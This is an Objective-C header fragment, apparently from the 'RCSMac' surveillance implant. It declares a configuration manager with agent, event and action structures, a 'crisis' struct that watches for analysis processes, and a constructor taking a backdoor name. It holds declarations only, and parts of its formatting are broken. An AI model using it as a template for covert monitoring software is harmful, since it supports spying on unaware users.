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Test Coverage
 * RCSMac - ConfiguraTor(i)
 *  This class will be responsible for all the required operations on the 
 *  configuration file
 * Ported in Objective-C from Mornella
 * Created by Alfredo 'revenge' Pesoli on 21/05/2009
 * Copyright (C) HT srl 2009. All rights reserved

#import <Cocoa/Cocoa.h>

#ifndef __RCSMConfigManager_h__
#define __RCSMConfigManager_h__

#import "RCSMCommon.h"

#import "NSString+SHA1.h"
#import "RCSMEncryption.h"

typedef struct _agent {
  u_int   agentID;
  u_int   status;  // Running, Stopped
  u_int   internalDataSize;
  //void *pParams;
  NSData  *internalData;
  void    *pFunc;        // Thread start routine
  u_int   command;
} agentStruct;

typedef struct _event {
  u_int   type;
  u_int   actionID;
  u_int   internalDataSize;
  NSData  *internalData;
  void    *pFunc;
  u_int   status;
  u_int   command;     // Used for communicate within the monitor
} eventStruct;

typedef struct _action {
  u_int   type;
  u_int   internalDataSize;
  NSData  *internalData;
} actionStruct;

typedef struct _actionContainer {
  u_int numberOfSubActions;
} actionContainerStruct;

typedef struct {
  UInt32  unused;
  UInt32  check_network;
  UInt32  check_system;
  UInt32  network_process_count;
  UInt32  system_process_count;
  char    process_names[1];
} crisisConfStruct;

// Only used if there's no other name to use
//#define DEFAULT_CONF_NAME    @"PWR84nQ0C54WR.Y8n"

@interface __m_MConfManager : NSObject

  NSData *mConfigurationData;
  __m_MEncryption *mEncryption;

- (id)initWithBackdoorName: (NSString *)aName;
- (void)dealloc;

- (BOOL)checkConfigurationIntegrity: (NSString *)configurationFile;
- (BOOL)loadConfiguration;
- (__m_MEncryption *)encryption;

